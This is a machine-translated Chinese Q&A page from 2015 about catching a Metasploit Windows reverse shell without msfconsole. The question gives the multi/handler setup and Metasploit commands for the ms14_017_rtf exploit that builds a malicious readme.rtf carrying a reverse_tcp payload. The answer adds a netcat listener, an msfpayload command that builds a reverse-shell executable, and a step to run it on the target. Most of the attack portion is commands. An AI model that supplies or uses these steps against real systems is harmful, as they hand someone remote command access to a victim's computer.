2015-11-06 81 views
0

對不起,我的英語。 使用metasploit我爲windows 7/windows/shell/reverse_tcp負載生成了漏洞利用。 後來我等待連接使用msfconsole:獨立多/處理程序reverse_tcp

use exploit/multi/handler 
set PAYLOAD windows/shell/reverse_tcp 
set LHOST 192.168.182.129 
set LPORT 4444 
exploit 

我成功地連接到命令窗口的線。 但是我需要期待連接而不使用metasploit。我發現瞭如何創建獨立模塊,但它僅用於利用。 我需要standalone multi/handler reverse_tcp或簡單的代碼來監聽某個端口,然後訪問命令行。

回答

0

我真的不知道你的限制/限制是。
我的猜測是,你想在沒有安裝metasploit的計算機上「接收shell」。
如果是這樣的話,你可以使用msfd(安裝在不同的計算機上的Metasploit守護),或者簡單的netcat,socat,...

你覺得這是什麼:

  • 聽力與192.168.1.2的netcat
    # nc -l -p 4444
  • 使用shell_reverse_tcp代替
    # msfpayload windows/shell_reverse_tcp LHOST=192.168.1.2 LPORT=4444 X /root/darkbird.exe
  • 對目標執行darkbird.exe
+0

感謝您的回覆。我早些時候嘗試過nc。連接已設置。但我無法發送命令(目錄或其他)。我在服務器上鍵入dir(其中運行nc),但什麼都不發生。 – tiigg

+0

你用什麼命令來生成shellcode? –

+0

'使用利用/窗/ FILEFORMAT/ms14_017_rtf'
'設置有效載荷窗戶/殼/ reverse_tcp'

'設置文件名readme.rtf'
'設置lhost 192.168.182.129'

'利用'
它生成帶有反向tcp負載的rtf文件。然後我在Windows上運行這個文件。而Windows應該連接服務器。 – tiigg